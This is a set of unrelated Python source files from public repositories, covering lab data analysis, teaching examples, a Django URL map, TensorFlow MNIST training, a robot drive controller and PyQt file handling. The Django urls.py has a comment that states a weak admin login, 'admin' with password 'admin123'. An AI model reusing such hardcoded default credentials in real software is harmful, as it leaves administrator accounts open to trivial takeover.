stimDiff.append(0)\n elif type(stimulusOff) == int:\n stimDiff.append(len(stimulusOn) - 1)\n else:\n stimDiff.append(len(stimulusOn) - len(stimulusOff))\n\ndist = {}\nfor i in stimDiff:\n dist[i] = dist.get(i,0)+1\n\n#hist\nplt.hist(np.array(distRT).flatten(), bins = 20)\n\n#weird Trials\nweirdTrials = []\nfor n, currTrial in enumerate(allTrialsData.item()[0]):\n extendedEOT = currTrial['extendedEOT'].item()['data']\n if extendedEOT == 6 and fieldInTrial(['reactTimeMS'], currTrial):\n weirdTrials.append(n)\n\n#stim diff for trials preceding the weird trials\nstimDiff = []\nfor i in weirdTrials:\n currTrial = allTrialsData.item()[0][i-1]\n trial = currTrial['trial'].item()['data'].item()\n if trial['instructTrial'] != 1:\n if fieldInTrial(['stimulusOn', 'stimulusOff'], currTrial): \n stimulusOn = currTrial['stimulusOn'].item()['timeMS'].item()\n stimulusOff = 
currTrial['stimulusOff'].item()['timeMS'].item()\n if type(stimulusOn) == int:\n stimDiff.append(0)\n elif type(stimulusOff) == int:\n stimDiff.append(len(stimulusOn) - 1)\n else:\n stimDiff.append(len(stimulusOn) - len(stimulusOff))\n\n\n'''\nMTNAN\n'''\n\n#code will generate a list of interstim frame diff for task gabor\nstimDescInterstim = []\nfor count, currTrial in enumerate(allTrialsData.item()[0]):\n print(count)\n trial = currTrial['trial'].item()['data'].item()\n stimDesc = currTrial['stimDesc'].item()['data'].item()\n taskStimCount = 0\n for stim in stimDesc:\n if stim['stimLoc'] == 2:\n if taskStimCount == 0:\n frameOff = stim['stimOffFrame']\n taskStimCount += 1\n else:\n frameDiff = stim['stimOnFrame'] - frameOff\n frameOff = stim['stimOffFrame']\n stimDescInterstim.append(frameDiff)\n\n\n\ntargetOnTimes = []\n\nfor currTrial in allTrialsData.item()[0]:\n trial = currTrial['trial'].item()['data'].item()\n if trial['instructTrial'] != 1 and trial['catchTrial'] != 1:\n targetOnTimes.append(trial['targetOnTimeMS'].tolist())\n \n\n\n\n\n# for count, i in enumerate(stimDesc['listType']):\n# if i == 2:\n# stimSeqLen = count\n# break\n# targetOnFrame = stimDesc['stimOnFrame'][stimSeqLen]\n# targetOnTimeMs = targetOnFrame * (1000/75)\n# targetOnTimes.append(targetOnTimeMS)\n\n'''\nMTNC\n'''\n\n#testing\nstimIndexCount = np.zeros(49) \nfor trialCount, corrTrial in enumerate(corrTrials):\n currTrial = allTrials[corrTrial]\n stimDesc = currTrial['stimDesc']['data']\n for stim in stimDesc:\n if stim['stimLoc'] == 0 and stim['listType'] == 1:\n stimIndex = np.int32(stim['stimIndex'])\n stCount = int(stimIndexCount[stimIndex])\n stimIndexCount[stimIndex] += 1\n\n\n'''\nMTNC\n'''\n\nfor shortTrial in shortRT:\n currTrial = allTrials[shortTrial]\n eyeXYPos = eyePosDurTrial(currTrial)\n eyeXYPos = eyePosDurTrial(currTrial)\n fixate = currTrial['fixate']['timeMS']\n trialStart = currTrial['trialStart']['timeMS']\n fixateTimeWRTEyePos = math.floor((fixate - trialStart)/2)\n windowWidth = currTrial['fixWindowData']['data']['windowDeg']['size']['width']\n windowHeight = currTrial['fixWindowData']['data']['windowDeg']['size']['height']\n\n for index, xDeg in enumerate(eyeXYPos['leftX'][fixateTimeWRTEyePos:]):\n if -(windowWidth/2) > xDeg or xDeg > (windowWidth/2):\n eyePosSac = index + fixateTimeWRTEyePos\n break\n eyePosSacTimeMS = eyePosSac * 2\n saccadeTime = currTrial['saccade']['timeMS']\n diff = (saccadeTime - trialStart) - eyePosSacTimeMS","repo_name":"MaunsellLab/MTCAN","sub_path":"Python Code/codeChecks.py","file_name":"codeChecks.py","file_ext":"py","file_size_in_byte":11084,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"3658376991","text":"#!/usr/bin/env python\n\n\nclass debugger(): # <1>\n\n function_calls = []\n\n def __init__(self, func): # <2>\n self._func = func\n\n def __call__(self, *args, **kwargs): # <3>\n\n # print(\"*\" * 40) # <4>\n # print(\"function {}()\".format(self._func.__name__)) # <4>\n # print(\"\\targs are \", args) # <4>\n # print(\"\\tkwargs are \", kwargs) # <4>\n #\n # print(\"*\" * 40) # <4>\n\n self.function_calls.append( # <5>\n (self._func.__name__, args, kwargs)\n )\n\n result = self._func(*args, **kwargs) # <6>\n return result # <7>\n\n @classmethod\n def get_calls(cls): # <8>\n return cls.function_calls\n\n@debugger # <9>\ndef hello(greeting, whom=\"world\"):\n print(\"{}, {}\".format(greeting, whom))\n\n@debugger # <9>\ndef bark(bark_word, *, repeat=2):\n print(\"{0}! 
\".format(bark_word) * repeat)\n\nhello('hello', 'world') # <10>\nprint()\n\nhello('hi', 'Earth')\nprint()\n\nhello('greetings')\n\nbark(\"woof\", repeat=3)\nbark(\"yip\", repeat=4)\nbark(\"arf\")\n\nhello('hey', 'girl')\n\nprint('-' * 60)\n\nfor i, info in enumerate(debugger.get_calls(), 1): # <11>\n print(\"{:2d}. {:10s} {!s:20s} {!s:20s}\".format(i, info[0], info[1], info[2]))\n","repo_name":"sa-i/20200414py3interm","sub_path":"EXAMPLES/deco_debug_class.py","file_name":"deco_debug_class.py","file_ext":"py","file_size_in_byte":1213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"3754969508","text":"\"\"\"Supp_project URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\n# admin: (user:admin, password:admin123)\nfrom django.contrib import admin\nfrom django.urls import path, include\nfrom django.views.static import serve\n\nfrom Supp_project.settings import MEDIA_ROOT\nfrom user import views\n\nurlpatterns = [\n path('', views.login),\n path('index', views.index),\n path('welcome', views.welcome),\n path('winning_bid_info', views.winning_bid_info),\n path('winning_detail', views.winning_detail),\n path('admin_info', views.admin_info),\n path('demo_add', views.demo_add),\n path('demo_edit', views.demo_edit),\n path('entrust_add', views.entrust_add),\n path('entrust_edit', views.entrust_edit),\n path('menu1', views.menu1),\n path('menu2', views.menu2),\n path('menu_add', views.menu_add),\n path('menu_see', views.menu_see),\n path('menu_edit', views.menu_edit),\n path('supplier_management', views.supplier_management),\n path('qualification_management', views.qualification_management),\n path('qua_mana_edit', views.qua_mana_edit),\n path('winning_detail_child', views.winning_detail_child),\n path('winning_detail_child_add', views.winning_detail_child_add),\n path('winning_detail_child_edit', views.winning_detail_child_edit),\n path('winning_bid_consum_deta', views.winning_bid_consum_deta),\n\n # path('upload', views.upload_img),\n\n # 接口\n path('sign_in/', views.sign_in, name='sign_in/'),\n path('zb_info/', views.zb_info, name='zb_info/'),\n path('test_api/', views.test_api, name='test_api/'),\n path('jbxx_info/', views.jbxx_info, name='jbxx_info/'),\n path('wtxx_info/', views.wtxx_info, name='wtxx_info/'),\n path('jbxx_edit/', views.jbxx_edit, name='jbxx_edit/'),\n path('jbxx_add/', views.jbxx_add, name='jbxx_add/'),\n path('wtxx_edit/', views.wtxx_edit, name='wtxx_edit/'),\n path('wtxx_add/', views.wtxx_add, name='wtxx_add/'),\n path('cglb_info/', views.cglb_info, name='cglb_info/'),\n path('cgmx_info/', views.cgmx_info, name='cgmx_info/'),\n path('shxx_info/', views.shxx_info, name='shxx_info/'),\n # path('menu_see_info/', views.menu_see_info, name='menu_see_info/'),\n path('get_menu_see/', views.get_menu_see, name='get_menu_see/'),\n path('menu_edit_info/', views.menu_edit_info, name='menu_edit_info/'),\n path('menu_add_info/', views.menu_add_info, name='menu_add_info/'),\n 
path('jbxx_del/', views.jbxx_del, name='jbxx_del/'),\n path('wtxx_del/', views.wtxx_del, name='wtxx_del/'),\n path('shxx_del/', views.shxx_del, name='shxx_del/'),\n path('upload_img/', views.upload_img, name='upload_img/'),\n path('jbxx_see/', views.jbxx_see, name='jbxx_see/'),\n path('jbxx_add/', views.jbxx_add, name='jbxx_add/'),\n path('winning_bid_consumables/', views.winning_bid_consumables, name='winning_bid_consumables/'),\n path('winning_bid_consumables_detailed/', views.winning_bid_consumables_detailed, name='winning_bid_consumables_detailed/'),\n]\n","repo_name":"yang94913/Supp_project","sub_path":"user/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":3536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"133750775","text":"\n\ndef basic_example_1d():\n from polynomials_on_simplices.polynomial.polynomials_monomial_basis import Polynomial\n p = Polynomial([1, 2, 3])\n print(p)\n print(p(1))\n print(2 * p)\n\n\ndef basic_example_2d():\n from polynomials_on_simplices.polynomial.polynomials_monomial_basis import Polynomial\n p = Polynomial([1, 2, 3], r=1, m=2)\n print(p)\n print(p((1, 2)))\n print(p**2)\n\n\ndef basic_example_1d2d():\n from polynomials_on_simplices.polynomial.polynomials_monomial_basis import Polynomial\n p = Polynomial([[1, 0], [2, 1], [3, 2]])\n print(p)\n print(p(1))\n\n\ndef lagrange_example_1d():\n import matplotlib.pyplot as plt\n from polynomials_on_simplices.calculus.plot_function import plot_function\n from polynomials_on_simplices.polynomial.polynomials_unit_simplex_lagrange_basis import lagrange_basis\n fig = plt.figure()\n for l in lagrange_basis(2, 1):\n plot_function(l, 0.0, 1.0, fig=fig)\n plt.show()\n\n\ndef lagrange_example_2d():\n import matplotlib.pyplot as plt\n from polynomials_on_simplices.calculus.plot_function import plot_bivariate_function\n from polynomials_on_simplices.geometry.primitives.simplex import unit\n from polynomials_on_simplices.polynomial.polynomials_unit_simplex_lagrange_basis import lagrange_basis_fn\n vertices = unit(2)\n l = lagrange_basis_fn((0, 1), 2)\n plot_bivariate_function(lambda x1, x2: l((x1, x2)), vertices)\n plt.show()\n\n\ndef lagrange_example_1d_arbitrary():\n import matplotlib.pyplot as plt\n from polynomials_on_simplices.calculus.plot_function import plot_function\n from polynomials_on_simplices.polynomial.polynomials_simplex_lagrange_basis import lagrange_basis_simplex\n fig = plt.figure()\n for l in lagrange_basis_simplex(2, [[1], [3]]):\n plot_function(l, 1.0, 3.0, fig=fig)\n plt.show()\n\n\ndef lagrange_example_2d_arbitrary():\n import matplotlib.pyplot as plt\n from polynomials_on_simplices.calculus.plot_function import plot_bivariate_function\n from polynomials_on_simplices.polynomial.polynomials_simplex_lagrange_basis import lagrange_basis_fn_simplex\n vertices = [\n [1.0, 0.0],\n [1.0, 1.0],\n [0.0, 1.0]\n ]\n l = lagrange_basis_fn_simplex((0, 1), 2, vertices)\n plot_bivariate_function(lambda x1, x2: l((x1, x2)), vertices)\n plt.show()\n\n\ndef lagrange_example_4d():\n from polynomials_on_simplices.polynomial.polynomials_unit_simplex_lagrange_basis import PolynomialLagrange\n p = PolynomialLagrange([1, 2, 3, 4, 5], r=1, m=4)\n print(p)\n print(p((0.1, 0.2, 0.3, 0.4)))\n\n\ndef lagrange_example_1d_dual_basis():\n from polynomials_on_simplices.polynomial.polynomials_unit_simplex_lagrange_basis import dual_lagrange_basis_fn, \\\n lagrange_basis_fn\n l0 = lagrange_basis_fn(0, 2)\n l1 = lagrange_basis_fn(1, 2)\n q0 = 
dual_lagrange_basis_fn(0, 2)\n    q1 = dual_lagrange_basis_fn(1, 2)\n    print(q0(l0))\n    print(q0(l1))\n    print(q1(l0))\n    print(q1(l1))\n\n\ndef differentiation_example():\n    from polynomials_on_simplices.polynomial.polynomials_unit_simplex_bernstein_basis import PolynomialBernstein\n    b = PolynomialBernstein([1, 0, 0, 1, 0, 0], r=2, m=2)\n    print(b)\n    print(b.latex_str_expanded())\n    print(b.partial_derivative(0).latex_str_expanded())\n    print(b.partial_derivative(1).latex_str_expanded())\n    from polynomials_on_simplices.calculus.polynomial.polynomials_calculus import derivative\n    print(derivative(b, (1, 1)))\n\n\ndef integration_example():\n    from polynomials_on_simplices.polynomial.polynomials_unit_simplex_bernstein_basis import bernstein_basis_fn\n    from polynomials_on_simplices.calculus.polynomial.polynomials_calculus import integrate_unit_simplex\n    b = bernstein_basis_fn((1, 0), 1)\n    print(b.latex_str_expanded())\n    print(integrate_unit_simplex(b))\n\n\ndef piecewise_polynomial_example_1d():\n    import matplotlib.pyplot as plt\n    from polynomials_on_simplices.piecewise_polynomial.plot_piecewise_polynomial import \\\n        plot_univariate_piecewise_polynomial\n    from polynomials_on_simplices.piecewise_polynomial.piecewise_polynomial_bernstein_basis import \\\n        piecewise_polynomial_bernstein_basis\n    lines = [[0, 1], [1, 2]]\n    vertices = [[1.0], [2.0], [3.0]]\n    fig = plt.figure()\n    for b in piecewise_polynomial_bernstein_basis(lines, vertices, r=2):\n        plot_univariate_piecewise_polynomial(b, fig=fig)\n    plt.show()\n\n\ndef piecewise_polynomial_example_2d():\n    from polynomials_on_simplices.piecewise_polynomial.plot_piecewise_polynomial import \\\n        plot_bivariate_piecewise_polynomial\n    from polynomials_on_simplices.piecewise_polynomial.continuous_piecewise_polynomial_bernstein_basis import \\\n        continuous_piecewise_polynomial_bernstein_basis\n\n    triangles = [\n        [0, 1, 2],\n        [1, 3, 2]\n    ]\n    vertices = [\n        [0.0, 0.0],\n        [1.0, 0.0],\n        [0.0, 1.0],\n        [1.0, 1.0]\n    ]\n    for b in continuous_piecewise_polynomial_bernstein_basis(triangles, vertices, r=1):\n        plot_bivariate_piecewise_polynomial(b, edge_resolution=2)\n\n\nif __name__ == \"__main__\":\n    basic_example_1d()\n    basic_example_2d()\n    basic_example_1d2d()\n\n    lagrange_example_1d()\n    lagrange_example_2d()\n    lagrange_example_1d_arbitrary()\n    lagrange_example_2d_arbitrary()\n    lagrange_example_4d()\n    lagrange_example_1d_dual_basis()\n\n    differentiation_example()\n    integration_example()\n\n    piecewise_polynomial_example_1d()\n    piecewise_polynomial_example_2d()\n","repo_name":"FAndersson/polynomials_on_simplices","sub_path":"docs/readme_examples.py","file_name":"readme_examples.py","file_ext":"py","file_size_in_byte":5485,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"}
{"seq_id":"19209853588","text":"# Adapted from the earlier forward-propagation code\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom tensorflow.keras import datasets\n\n# x: [60k,28,28],[10k,28,28]\n# y: [60k],[10k]\n(x, y), (x_test, y_test) = datasets.mnist.load_data()\n\n# Convert the dataset into tensors\nx = tf.convert_to_tensor(x, dtype=tf.float32)\ny = tf.convert_to_tensor(y, dtype=tf.int32)\n\nx_test = tf.convert_to_tensor(x_test, dtype=tf.float32)\ny_test = tf.convert_to_tensor(y_test, dtype=tf.int32)\n\nprint(x.shape, y.shape, x.dtype, y.dtype)\nprint(tf.reduce_min(x), tf.reduce_max(x))\nprint(tf.reduce_min(y), tf.reduce_max(y))\n\n# Take 128 samples per batch\ntrain_db = tf.data.Dataset.from_tensor_slices((x, y)).batch(128)\n
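# A Dataset built with from_tensor_slices pairs each image with its label; batch(128) makes\n# each step consume a [128, 28, 28] image tensor together with a matching [128] label tensor.\ntest_db = tf.data.Dataset.from_tensor_slices((x_test, 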
y_test)).batch(128)\ntrain_iter = iter(train_db) # iterator over batches\nsample = next(train_iter)\nprint('batch', sample[0].shape, sample[1].shape)\n\n# Build a small toy network by declaring its weights directly\n# Network structure: [b,784]->[b,256]->[b,128]->[b,10]\n# Weights are [dim_in, dim_out], biases are [dim_out]\nw1 = tf.Variable(tf.random.truncated_normal([784, 256], stddev=0.01)) # small stddev to avoid exploding gradients\nb1 = tf.Variable(tf.zeros([256]))\nw2 = tf.Variable(tf.random.truncated_normal([256, 128], stddev=0.01))\nb2 = tf.Variable(tf.zeros([128]))\nw3 = tf.Variable(tf.random.truncated_normal([128, 10], stddev=0.01))\nb3 = tf.Variable(tf.zeros([10]))\nlr = 1e-3 # learning rate\n\nfor epoch in range(50): # iterate over the whole dataset several times\n    for step, (x, y) in enumerate(train_db): # iterate batch by batch\n        # x:[128,28,28]\n        # y:[128]\n\n        # Reshape so the data fits the forward pass\n        # [b,28,28]->[b,28*28]\n        x = tf.reshape(x, [-1, 28 * 28])\n\n        # Wrap the computation in a gradient tape so gradients can be taken later;\n        # any code that touches the weights must go inside\n        with tf.GradientTape() as tape: # only tf.Variable is tracked; defining the weights as constants would fail\n            # x:[b,28*28]\n            # h1=x@w1+b1\n            # [b,784]@[784,256]+[256]->[b,256]+[256]->[b,256]+[b,256]\n            h1 = x @ w1 + tf.broadcast_to(b1, [x.shape[0], 256])\n            h1 = tf.nn.relu(h1) # nonlinear activation\n            # [b,256]->[b,128]\n            h2 = h1 @ w2 + b2\n            h2 = tf.nn.relu(h2)\n            # output layer\n            out = h2 @ w3 + b3\n\n            # compute loss\n            # out:[b,10]\n            # y:[b]-> [b,10]\n            y_onehot = tf.one_hot(y, depth=10)\n\n            # mse=mean(sum(y-out)^2)\n            # [b,10]\n            loss = tf.square(y_onehot - out)\n            # mean:scalar\n            loss = tf.reduce_mean(loss)\n\n        # Compute gradients from the taped computation above\n        grads = tape.gradient(loss, [w1, b1, w2, b2, w3, b3])\n        # w1=w1-lr*w1_grad\n        # Update the parameters in place\n        w1.assign_sub(lr * grads[0]) # order matches the variable list above\n        b1.assign_sub(lr * grads[1])\n        w2.assign_sub(lr * grads[2])\n        b2.assign_sub(lr * grads[3])\n        w3.assign_sub(lr * grads[4])\n        b3.assign_sub(lr * grads[5])\n\n        if step % 100 == 0:\n            print(epoch, step, 'loss:', float(loss))\n\n    # test/evaluation of the current parameters\n    # reuse the trained w1,w2,w3,b1,b2,b3\n    total_correct, total_num = 0, 0\n    for step, (x, y) in enumerate(test_db):\n        # [b,28,28]=>[b,28*28]\n        x = tf.reshape(x, [-1, 28 * 28])\n\n        # [b,784]=>[b,256]=>[b,128]=>[b,10]\n        h1 = tf.nn.relu(x @ w1 + b1)\n        h2 = tf.nn.relu(h1 @ w2 + b2)\n        out = h2 @ w3 + b3\n\n        # out:[b,10] -R\n        # prob:[b,10]-[0,1]\n        # map the logits to probabilities with softmax\n        prob = tf.nn.softmax(out, axis=1)\n        # take the index of the largest probability, [b,10]=>[b]; argmax returns int64 by default\n        pred = tf.cast(tf.argmax(prob, axis=1), dtype=tf.int32)\n        # y:[b], compare with the labels\n        correct = tf.cast(tf.equal(pred, y), dtype=tf.int32)\n        correct = tf.reduce_sum(correct)\n        # accumulate the number of correct predictions\n        total_correct += int(correct)\n        total_num += x.shape[0]\n\n    acc = total_correct / total_num\n    print('test acc: ', acc)\n","repo_name":"LegendZh/tensorflow-learning","sub_path":"测试(张量)实战/forward.py","file_name":"forward.py","file_ext":"py","file_size_in_byte":4209,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"}
{"seq_id":"17437662672","text":"import time\nimport math\nimport numpy as np\nfrom pprint import pprint, pformat\n\ndef clamp(minimum, x, maximum):\n    # Clamp the value of x to be between minimum and maximum\n    return max(minimum, min(x, maximum))\n\ndef shortest_angular_difference(firstAngle, secondAngle):\n    difference = secondAngle - firstAngle\n    while (difference < -180):\n        difference += 360\n    while (difference > 180):\n        difference -= 360\n    return difference\n\nclass RobotDiffDriveController:\n    '''\n    A simple P-controller for differential drive robots\n    '''\n\n    x_current_pose = None\n    y_current_pose = None\n    current_heading = None # Degrees\n\n    def __init__(self, **kwargs):\n\n        # P-controller settings\n        
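# proportional gains: kP_lin scales the distance error, kP_ang scales the heading error (degrees)\n        self.kP_lin = kwargs.get('kP_lin', 0.05)\n        self.kP_ang = 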
kwargs.get('kP_ang', 0.05)\n\n # Velocity Constraints\n self.max_lin_vel = kwargs.get('max_lin_vel', 0.6)\n self.max_ang_vel = kwargs.get('max_ang_vel', 0.0)\n \n self.max_driver_power = kwargs.get('max_driver_power', 1.0)\n self.min_driver_power = kwargs.get('min_driver_power', 0.2)\n\n # Stop moving if we are in a radius of reached_target_threshold metres from the target\n self.reached_target_threshold = kwargs.get('reached_target_threshold', 1.0)\n\n self.verbose = kwargs.get('verbose', False)\n\n print('Starting the differential drive controller with the following settings: ')\n pprint(kwargs)\n time.sleep(3.0)\n\n def position_update(self, x, y):\n self.x_current_pose = x\n self.y_current_pose = y\n\n if self.verbose:\n print('Robot is at position: ({:.2f}, {:.2f})'.format(x, y))\n\n def heading_update(self, heading_degrees):\n self.current_heading = heading_degrees\n\n if self.verbose:\n print('Robot has heading: ({:.2f})'.format(heading_degrees))\n\n def get_wheel_velocities(self, x_desired, y_desired):\n for varname in ['x_current_pose', 'y_current_pose', 'current_heading']:\n if not(varname in vars(self)):\n raise Exception('{} has not been set. Robot cannot drive without this'.format(varname))\n\n delta_x = self.x_current_pose - x_desired\n delta_y = self.y_current_pose - y_desired\n\n # Pythagoras to find distance to target\n dist_to_target = math.sqrt(math.pow(delta_x,2) + math.pow(delta_y,2))\n\n # Trigonometry\n heading_to_target_deg = math.atan2(delta_y, delta_x) * (180.0 / math.pi)\n \n # Compute Shortest Angular Difference in degrees\n delta_heading = shortest_angular_difference(self.current_heading, heading_to_target_deg)\n\n if self.verbose:\n print('Robot target position set to: ({:.2f}, {:.2f}). Robot has to travel {:.2f} metres at a heading of {:.2f} degrees, turning {:.2f} degrees'.format(\n x_desired, y_desired, dist_to_target, heading_to_target_deg, delta_heading))\n \n # Convert heading difference back to radians\n desired_heading_rad = delta_heading * (math.pi / 180.0)\n\n linear_velocity = self.kP_lin * dist_to_target\n angular_velocity = self.kP_ang * delta_heading\n\n if self.verbose:\n print('LIN_VEL: {:.2f}, ANG_VEL: {:.2f}'.format(linear_velocity, angular_velocity))\n\n # Limit The Velocities\n linear_velocity = clamp(0, linear_velocity, self.max_lin_vel)\n angular_velocity = clamp(-self.max_ang_vel, angular_velocity, self.max_ang_vel)\n\n # Calculate the motor speeds\n left_speed, right_speed = 0.0, 0.0\n if dist_to_target > self.reached_target_threshold:\n\n # vel_arr consists of [Left Speed Un-normalised, Right Speed Un-normalised]\n vel_arr = np.asarray([linear_velocity - angular_velocity, linear_velocity + angular_velocity])\n left_speed, right_speed = vel_arr\n\n # # Normalise: compute the velocity direction unit-vector\n # vel_dir_vec = vel_arr / np.linalg.norm(vel_arr)\n # print(vel_dir_vec)\n\n # Multiply the unit-vector by the robot max velocity to get the actual motor speeds\n # left_speed, right_speed = vel_dir_vec * self.max_driver_power\n\n if self.verbose:\n print('Unconstrained speeds: ({:.2f}, {:.2f})'.format(left_speed, right_speed))\n else:\n left_speed, right_speed = 0.0, 0.0\n if self.verbose:\n print('REACHED TARGET!')\n\n # Limit the motor speeds to the maximum the robot should go\n # Prevent it from moving any wheel backwards\n # left_speed = clamp(-self.max_driver_power, left_speed, self.max_driver_power)\n # right_speed = clamp(-self.max_driver_power, right_speed, self.max_driver_power)\n\n # Prevent it from moving any wheel 
backwards\n left_speed = clamp(0.0, left_speed, self.max_driver_power)\n right_speed = clamp(0.0, right_speed, self.max_driver_power)\n\n # Cut power if below threshold\n # This avoids motor windings burning out\n if abs(left_speed) < self.min_driver_power:\n left_speed = 0.0\n\n if abs(right_speed) < self.min_driver_power:\n right_speed = 0.0\n\n return (left_speed, right_speed)\n","repo_name":"clungzta/roboRoller","sub_path":"diff_drive.py","file_name":"diff_drive.py","file_ext":"py","file_size_in_byte":5250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"16512246181","text":"import gzip\nimport os\n\nimport numpy as np\nfrom PIL import Image\nfrom PyQt5.QtCore import *\n\nclass SaveLoad(QObject):\n\n finished = pyqtSignal()\n create_set = pyqtSignal(str, object)\n add_to_training_set = pyqtSignal(str, object)\n add_to_testing_set = pyqtSignal(object)\n one_iteration = pyqtSignal(int, str)\n set_iteration_stats = pyqtSignal(list)\n set_classified_info = pyqtSignal(str, int, int)\n\n def __init__(self, filename=None, sets=None, testing_images=None, folder_name=None, iteration_stats=None):\n super().__init__()\n self.filename = filename\n self.sets = sets\n self.testing_images = testing_images\n self.folder_name = folder_name\n self.iteration_stats = iteration_stats\n\n def export_sets(self):\n total_image_count = 0\n images_done = 0\n\n for set in self.sets:\n total_image_count += len(set.all_images)\n\n for set in self.sets:\n set_dir = os.path.join(self.folder_name, set.name)\n if not os.path.exists(set_dir):\n os.makedirs(set_dir)\n images = set.all_images\n for i, image in enumerate(images):\n images_done += 1\n new_img = Image.fromarray(image.imageData.reshape(44, -1))\n img_title = image.title\n if not image.title:\n img_title = set.name + \"-\" + str(i) + \".tif\"\n new_img.save(os.path.join(set_dir, img_title))\n self.finished_one_iteration((images_done + 1) / total_image_count, \"Exporting set \" + set.name)\n\n self.finished.emit()\n\n def load_images(self):\n inF = gzip.open(self.filename, 'rb')\n s = inF.read()\n inF.close()\n lines = s.decode(\"utf-8\").splitlines()\n setName = None\n reading_status = 0\n num_lines = len(lines)\n for i, line in enumerate(lines):\n\n if \"Iteration stats:\" in line:\n reading_status = 2\n elif \"Set:\" in line:\n setName = line.replace(\"Set: \", \"\", 1)\n reading_status = 1\n self.create_set.emit(setName, [])\n elif \"Icl:\" in line:\n others = line.replace(\"Icl: \", \"\", 1).split(\",\")\n self.set_classified_info.emit(setName, int(others[0]), int(others[1]))\n elif \"Testing set\" in line:\n reading_status = 0\n else:\n # Line is an image\n pixels = line.split(\",\")\n image = []\n image_plain = []\n for pixel in pixels:\n image_plain.append(pixel)\n image.append(np.uint8(pixel))\n\n if len(image) == 0: continue\n if reading_status == 1:\n self.add_to_training_set.emit(setName, [np.array(image)])\n elif reading_status == 0:\n self.add_to_testing_set.emit(np.array(image))\n elif reading_status == 2:\n # Reading iteration stats\n self.set_iteration_stats.emit(image_plain)\n\n self.finished_one_iteration((i + 1) / num_lines, \"Loading images\")\n\n self.finished.emit()\n\n def save_images(self):\n\n f = gzip.open(self.filename, \"wb\")\n\n # Copy testing set to save\n testing_set = self.testing_images\n testing_set_len = len(testing_set)\n total_len = testing_set_len\n current_item = 0\n\n for set in self.sets:\n total_len += len(set.all_images)\n\n if self.iteration_stats and 
len(self.iteration_stats) > 0:\n            f.write(bytes(\"Iteration stats:\\n\", encoding=\"utf-8\"))\n            for i, num in enumerate(self.iteration_stats):\n                extra = '' if i == (len(self.iteration_stats) - 1) else ','\n                f.write(bytes(str(num) + extra, encoding=\"utf-8\"))\n            f.write(bytes('\\n', encoding=\"utf-8\"))\n\n        if testing_set_len > 0:\n            f.write(bytes('Testing set\\n', encoding=\"utf-8\"))\n            for image in testing_set:\n                for i, pixel in enumerate(image):\n                    extra = '' if i == (len(image) - 1) else ','\n                    f.write(bytes(str(pixel) + extra, encoding=\"utf-8\"))\n                f.write(bytes('\\n', encoding=\"utf-8\"))\n                current_item += 1\n                self.finished_one_iteration(current_item / total_len, \"Saving images\")\n\n        for set in self.sets:\n            images = set.all_images\n            f.write(bytes('Set: ' + set.name + '\\n', encoding=\"utf-8\"))\n            f.write(bytes(\"Icl: \" + str(set.incorrectly_classified_local) + ',' + str(set.incorrectly_classified) +' \\n', encoding=\"utf-8\"))\n            for image in images:\n                for i, pixel in enumerate(image.imageData):\n                    extra = '' if i == (len(image.imageData) - 1) else ','\n                    f.write(bytes(str(pixel) + extra, encoding=\"utf-8\"))\n                f.write(bytes('\\n', encoding=\"utf-8\"))\n                current_item += 1\n                self.finished_one_iteration(current_item / total_len, \"Saving images\")\n\n        f.close()\n\n    def finished_one_iteration(self, amount, label):\n        self.one_iteration.emit(int(amount * 100), label)","repo_name":"ThusStyles/finalyearproject","sub_path":"Framework/GUI/ThreadOps/SaveLoad.py","file_name":"SaveLoad.py","file_ext":"py","file_size_in_byte":5283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"5221985400","text":"import codecs\nimport os\nimport time\nimport argparse\n\n\n\"\"\"Note that the TF-IDF retriever RetrieverProcess cannot retrieve when there are fewer than 3 files in MyCorpus; this file addresses that issue.\"\"\"\n\"\"\"Will be dug into.\"\"\"\n\n\ndef create_Notselected_files(filepath):\n    if not os.path.isfile(filepath):\n        with codecs.open(filepath, 'w+', encoding='utf8') as fp:\n            fp.write(\"I'm pretty sure that it is not the answer.\")\n\ndef create_Notselected_file(corpus_path):\n    ctime = str(int(round(time.time() * 1000)))\n    # join with corpus_path, otherwise isfile() is checked relative to the working directory\n    num_of_files = len([name for name in os.listdir(corpus_path) if os.path.isfile(os.path.join(corpus_path, name))])\n    if num_of_files < 3:\n        create_Notselected_files(corpus_path + ctime + \"1\" + \".txt\")\n        create_Notselected_files(corpus_path + ctime + \"2\" + \".txt\")\n        create_Notselected_files(corpus_path + ctime + \"3\" + \".txt\")\n\nif __name__ == \"__main__\":\n    parser = argparse.ArgumentParser()\n    parser.add_argument('MyCorpus_path', type=str, help='MyCorpus/')\n    args = parser.parse_args()\n    create_Notselected_file(args.MyCorpus_path)\n","repo_name":"Mohan-Zhang-u/NLPDemoServer","sub_path":"MyFlaskBackEnd/MyQA/FillInRandomFilesIfNeeded.py","file_name":"FillInRandomFilesIfNeeded.py","file_ext":"py","file_size_in_byte":1266,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"}
{"seq_id":"6081260166","text":"\"\"\" Simple Python client for programmatic interaction with the CTBREC server\n\n###################################################################################\nWARNING - Make a backup of your server.json file before using the CtbRec class 
